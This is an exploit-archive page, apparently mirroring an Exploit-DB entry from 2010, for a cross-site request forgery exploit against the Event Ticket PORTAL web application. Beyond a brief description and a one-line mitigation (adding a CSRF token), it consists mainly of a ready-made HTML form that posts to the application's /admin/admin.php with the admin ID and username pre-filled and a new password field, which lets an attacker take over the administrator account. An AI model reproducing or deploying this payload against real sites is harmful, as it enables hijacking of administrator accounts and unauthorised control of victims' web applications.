header-logo
Suggest Exploit
vendor:
Event Ticket PORTAL
by:
KnocKout
8,8
CVSS
HIGH
CSRF
352
CWE
Product Name: Event Ticket PORTAL
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Vista, Demo
2010

Event Ticket PORTAL <= Admin Password Change (CSRF) Exploit

The Event Ticket PORTAL web application is vulnerable to a CSRF attack which allows an attacker to change the admin password. The exploit is achieved by sending a malicious HTML form to the victim which contains the new password. The form is sent to the /admin/admin.php page of the application.

Mitigation:

Implementing a CSRF token in the HTML form to verify the authenticity of the request.
Source

Exploit-DB raw data:

===========================================================
Event Ticket PORTAL <= Admin Password Change (CSRF) Exploit
===========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Event Ticket PORTAL
|~Price : 149 Euro
|~Version : N/A
|~Software: http://www.tourismscripts.com
|~Vulnerability Style : CSRF
|~Vulnerability Dir : /admin
|~Google Keyword : N/A
|[~]Date : "18.10.2010"
|[~]Tested on : (L):Vista (R):Demo
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#########################################################
the target can be changed according to
<form method="post" action="http://VICTIM/admin/admin.php">
########################################################

    ~~~~~~~~ Explotation| Exploit.HTML ~~~~~~~~~~~
    
========(CSRF) Html Exploit=========

<h3>Event Ticket PORTAL - Admin Password Chage (CSRF) Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://server/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>

</table>


========(CSRF) Html Exploit=========
    
     GoodLUCK.